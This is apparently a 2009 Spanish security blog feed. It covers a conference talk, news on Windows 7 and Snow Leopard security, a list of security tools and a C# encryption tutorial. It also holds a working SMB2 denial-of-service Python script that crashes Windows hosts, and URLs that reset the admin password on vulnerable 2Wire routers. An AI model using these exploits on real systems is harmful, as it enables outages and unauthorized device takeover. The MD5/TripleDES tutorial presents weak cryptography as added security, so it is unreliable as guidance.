La conferencia de seguridad informática estaba planeada para 1 hr. sin embargo, gracias a la aceptación e interés de los alumnos, se extendio hasta 1 hr con 45 min. aproximádamente.

En la conferencia se habló sobre la seguridad informática Física, Lógica, amenazas humanas (Hackers, Crackers, Lamers, Script Kiddies, etc…), y se hizo demostraciones de vulnerablidades de SQL Injection, XSS, exploits de algunos sitios en producción. También se hizo desmostración de técnicas como Scanning, DNS Spoof, Sniffing y Phishing.

Les dejo la presentación para su descarga: Presentación Seguridad Informática

Todavía no aparece oficialmente, pero la versión final de Windows 7 ya tiene su primer parche. La semana pasada, Microsoft arregló nueve vulnerabilidades, de las que cinco fueron consideradas “críticas”.

Así que si el jueves piensas cambiarte al nuevo sistema operativo de Microsoft, ya necesitarás bajar la primera actualización de seguridad.

Microsoft descubrió 34 fallas que afectaban a Windows XP, Vista y la versión final de Windows 7, que intentó arreglar rápidamente. Pese a que Windows 7 presentó problemas, la cantidad de fallas es menor a lo que registraron XP (24 de 34, con 18 de ellas marcadas como críticas) y Vista (19 de 34, 11 críticas).

De acuerdo a los expertos, la presencia de fallas en Windows 7 se debería al uso de código reciclado heredado de sus antecesores. Por lo menos éstas ya están solucionadas, aunque no se descarta que una vez que aparezca, se descubran otras más.

Vía Microsoft issues first Windows 7 patches

Comida, hacks and beers =)

antoniomtz: “A GnDx le gusta el pythoon”

Segun dailytech.com, algunos expertos en seguridad y reconocidos hackers alertan que el último Sistema Operativo presentado por la manzana blanca, Snow Leopard, es menos seguro que el próximo Sistema Operativo de Microsoft, Windows 7.

Estas afirmaciones se basan en el hecho de que Snow Leopard trae desactivado por defecto el cortafuegos (aunque el usuario lo puede volver a activar), que las actualizaciones no sean totalmente automáticas y que Safari incluye un sistema antiphising muy débil.

A lo anterior se debe agregar el hecho de que Apple incluyó en Snow Leopard una versión de Adobe Flash que era vulnerable a ataques, aunque esto último fue solucionado con la primera actualización del Sistema Operativo.

El reconocido hacker Charlie Miller ha criticado que Snow Leopard no incluya ninguna modificación relacionada con la forma como el sistema asigna la memoria disponible en forma aleatoria, una debilidad que ya era conocida en versiones anteriores de Mac OS y que en este último Sistema Operativo sigue igual. Es por esta razón que es mucho más fácil para los hackers realizar un ataque contra Snow Leopard que contra Windows 7.

Claro que no todo han sido críticas, porque Miller reconoce las mejoras de seguridad introducidas en QuickTime X (el que fue re-escrito completamente) y la efectiva implementación del sistema de prevención de ejecución de datos (DEP), un sistema que protege el uso de la memoria y que se encuentra integrado en Windows 7.

Solución?

Por el momento no la hay, simplemente cerrar puertos del SMB.

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> =) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Ha sido publicada una vulnerabilidad de los routers 2WIRE en el cual puedes cambiar el password de Administrador si éste ya fué configurado.

Los modelos vulnerables son:

• 2Wire 2701 Gateway
• 2Wire 1800HW
• 2Wire 1701HG

Y los firmwares vulnerables:

• 5.29.51
• 3.17.5
• 3.7.1

Firmware NO VULNERABLE:
5.29.135.5

Para establecer una nueva contraseña si ésta ya fué establecida, simplemente vamos a ésta dirección:

http://gateway.2wire.net?xslt?page=CD35_SETUP_01

Si quieres resetear el password:

http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm

hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh
kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm

Descargar video demostrativo.

Conclusión:

Los problemas con los routers 2WIRE continuan , y ésto afecta a grandes compañias que utilizan éste tipo de aparatos, lo más recomendable es comprar otro tipo de router ó actualizar el firmware de nuestro router 2WIRE.

Aquí les traigo algunas de las herramientas de seguridad libres más populares sacadas de la lista de Top 100 Network Security Tools de insecure.org:

• Nessus: Es la herramienta de evaluación de vulnerabilidades para UNIX de mayor renombre.

  Nessus es el mejor escaner de vulnerabilidades “Open Source” que hay disponible en la red y el que mejor funciona sobre UNIX. Se actualiza constantemente, con más de 11.000 plugins gratuitos (requiere registro y aceptar el EULA). Las características principales incluyen chequeos de seguridad remotos y locales (con autenticación) , una arquitectura cliente/servidor con un interfaz gráfico GTK (GIMP toolkit), y un Lenguaje de Scripting de Ataque Nessus (NASL) para escribir tus propios plugins o entender los existentes. Nessus 3 ahora es de código cerrado, pero es de coste gratuito a menos que desees los plugins más nuevos.

• Wireshark: Esnifando el pegamento que mantiene unido Internet

  Wireshark (conocido hasta el verano del 2006 como Ethereal debido a un conflicto de marca registrada) es un fantástico analizador de protocolos de red “Open Source” para Unix y Windows. Permite que examines los datos de una red o de un archivo de captura almacenado en disco. Puedes visualizar directamente los datos de la captura, descendiendo en el nivel de detalle del paquete que necesitas. Wireshark tiene varias características de gran potencia, incluyendo un amplio lenguaje de filtrado de paquetes para su visualización y la capacidad de visualizar una sesión TCP reconstruida. También soporta cientos de protocolos y tipos de red. Incluye una versión en modo consola, como tcpdump, llamada tethereal.

  Un consejo de seguridad, Ethereal ha sufrido docenas de vulnerabilidades explotables en remoto, así que mantenlo actualizado y se cuidadoso donde lo ejecutes si va a funcionar en redes poco seguras u hostiles (tales como conferencias de la seguridad).

• Snort: El IDS de libre distribución preferido por todo el mundo.

  Este ligero sistema de detección y prevención de intrusiones de red sobresale en el análisis y registro del tráfico de paquetes sobre redes TCP/IP. A través del análisis del protocolo, buscando en su contenido, y de varios pre procesadores, Snort detecta miles de gusanos y virus, intentos de explotar vulnerabilidades, escaneos de puertos, y otros comportamientos sospechosos. Snort utiliza un lenguaje flexible basado en reglas (rules) para describir el tráfico que debe filtrar o permitir, y un motor modular de detección. También se pueden monitorizar las alertas de Snort mediante un interfaz web (Basic Analysis and Security Engine – BASE)

  La libre distribuciñon de Snort lo hace ideal para trabajar en usuarios, pequeñas empresas, y otras redes. La empresa de su creador, SourceFire , ofrece una línea de productos complementarios con más características destinadas a nivel empresarial y actualizaciones de reglas en tiempo real. Ofrecen de forma gratuita (requiere registro) una actualización de las reglas con 5 días de retraso, y también puedes encontrar muchas reglas gratuitas muy buenas en el Bleeding Edge Snort

• Netcat: La navaja suiza de las redes
  Esta sencilla herramienta lee y escribe datos a través las conexiones de red usando los protocolos TCP o UDP. Está diseñada para ser una utilidad confiable de fácil manejo para el usuario final que pueda ser llamada directamente por otros programas y scripts.

  Al mismo tiempo, es una gran herramienta para explorar y depurar los errores de una red, puesto que puede crear casi cualquier clase de conexión que necesites, incluyendo puertos que enlazan con conexiones entrantes. La versión original de Netcat fue lanzada por Hobbit en 1995, pero no se ha mantenido a pesar de su inmenso renombre. A veces puede ser difícil encontrar nc110.tgz. La flexibilidad y la utilidad de esta herramienta han incitado a mucha otra gente a escribir otras implementaciones de Netcat – a menudo con las características modernas no encontradas en la original. Una de las más interesantes es Socat, que amplía Netcat para soportar muchos otros tipos de sockets, cifrado SSL, proxies SOCK, y muchos más. También existe Ncat de Chris Gibson, que ofrece aún más características mientras que es tan portable y compacto como el resto.

• Retina: Escáner de vulnerabilidades comercial de eEye

  Como Nessus, la función de Retina es explorar todas las maquinas de una red e informar sobre cualquier vulnerabilidad encontrada. Fue escrita por eEye, quienes son buenos conocedores de las investigaciones de seguridad informática.

  Instalación

  En debian/Ubuntu , no hay mayores complicaciones:

  # aptitude install nessus snort netcat
  

  ]]> http://antoniomtz.org/2009/08/herramientas-de-seguridad-libres/feed/ 0 http://antoniomtz.org/2009/08/twitter-sufre-un-ataque-dos-denial-of-service/ http://antoniomtz.org/2009/08/twitter-sufre-un-ataque-dos-denial-of-service/#comments Fri, 07 Aug 2009 17:49:48 +0000 antoniomtz http://www.antoniomtz.org/?p=315

  Leyendo en el blog de Linuxman, me entero que twitter ha sufrido un ataque DoS y estuvo fuera de servicio por algunas horas, éstos son algunos de los mensajes de los administradores:

  We are defending against a denial-of-service attack, and will update status again shortly.
  Update: the site is back up, but we are continuing to defend against and recover from this attack.

  Pueden checar el status de twitter desde el Twitter Status.

  ]]> http://antoniomtz.org/2009/08/twitter-sufre-un-ataque-dos-denial-of-service/feed/ 0 http://antoniomtz.org/2009/07/iweplite-liberado/ http://antoniomtz.org/2009/07/iweplite-liberado/#comments Wed, 15 Jul 2009 22:31:47 +0000 antoniomtz http://localhost/wordpress2/?p=262
  Buenas noticias, ha sido liberada la aplicación iWepLite para iPhone OS 3.0 con la cuál podemos desencriptar claves WEP de Access Points.

  Para poder instalarla, debemos agregar la siguiente URL en el source de cydia:

  wazowski.iespana.es/repo
  

  Cabe mencionar que la aplicación acaba de ser liberada por lo que tiene algunos bugs, según comentan en foros, esa aplicación sólo funciona para españa, la verdad no entiendo porque si los routers aquí y en china son los mismos, pero bueno, probando la aplicación las redes que detectó fueron incomtatibles por lo que no he podido probarla bien.

  
  ]]> http://antoniomtz.org/2009/07/iweplite-liberado/feed/ 1 http://antoniomtz.org/2009/07/encriptacion-de-texto-en-c-con-mono/ http://antoniomtz.org/2009/07/encriptacion-de-texto-en-c-con-mono/#comments Wed, 15 Jul 2009 07:19:38 +0000 antoniomtz http://localhost/wordpress2/?p=261

  La encriptación en el área de seguridad es muy importante, y más aún en una aplicación a la hora de guardar contraseñas en una base de datos.

  Aquí les dejo un proyecto con el cuál podemos encriptar y desencriptar texto con la ayuda de algunas clases que se encuentran en .NET, me basé en ésta página Using System.Linkecubeko

  Para comenzar utilizaremos los siguientes espacios de nombres:

  using System.Text;
  using System.Security.Cryptography;
  

  Y con las siguientes clases:

  MD5CryptoServiceProvider (Clase)

  Calcula el valor de hash MD5 (Message-Digest Algorithm 5), de los datos de entrada utilizando la implementación proporcionada por el proveedor de servicios criptográfico (CSP). Esta clase no se puede heredar.

  UTF8Encoding (Clase)

  Representa una codificación UTF-8 de caracteres Unicode.

  TripleDESCryptoServiceProvider (Clase)

  Define un objeto contenedor para obtener acceso a la versión del proveedor de servicios criptográficos (CSP) del algoritmo TripleDES (algoritmo que hace triple cifrado del algoritmo Data Encryption Standard) No se puede heredar esta clase.

  CipherMode (Enumeración)

  Especifica el modo de cifrado de bloques que se utilizará para cifrar.
  PaddingMode (Enumeración)

  Especifica el tipo de relleno que se aplica cuando el bloque de datos del mensaje es más pequeño que el número total de bytes necesarios para una operación criptográfica.

  ICryptoTransform (Interfaz)

  Define las operaciones básicas de las transformaciones criptográficas.

  Gracias al proyecto mono, podemos crear esta clase y liberarla bajo la licencia GPL.

  Aquí les dejo la clase cifrado ya codificada: cifrado.cs

  Para comenzar, creamos un proyecto nuevo C# con Gtk# en Monodevelop y creamos una forma más ó menos como ésta:

  

  Para facilitar mejor las cosas he creado una dll con las clases para encriptar y desencriptar, primero nos descargamos la dll: criptologia.dll, luego la agregamos como referencia a nuestro proyecto dando click derecho en Referencias y luego Editar preferencias… .:

  

  Ahora en el evento Click del Botón que dice encriptar, ponemos lo siguiente:

  criptologia.Cifrado oCifrado = new criptologia.Cifrado();
  entry2.Text = oCifrado.Encriptar(entry1.Text);
  

  Y en el evento Click del Botón desencriptar, ponemos:

  criptologia.Cifrado oCifrado = new criptologia.Cifrado();
  entry3.Text = oCifrado.Desencriptar(entry2.Text);
  

  Aquí les dejo el proyecto terminado: encriptacion.zip.

  Conclusión:

  Con ésto podemos agregar mayor seguridad en nuestros aplicaciónes ó sistemas, gracias a mono nuestra DLL es libre y se puede utilizar con cualquier propósito, estudiar, modificar y redistribuir.

  ]]> http://antoniomtz.org/2009/07/encriptacion-de-texto-en-c-con-mono/feed/ 2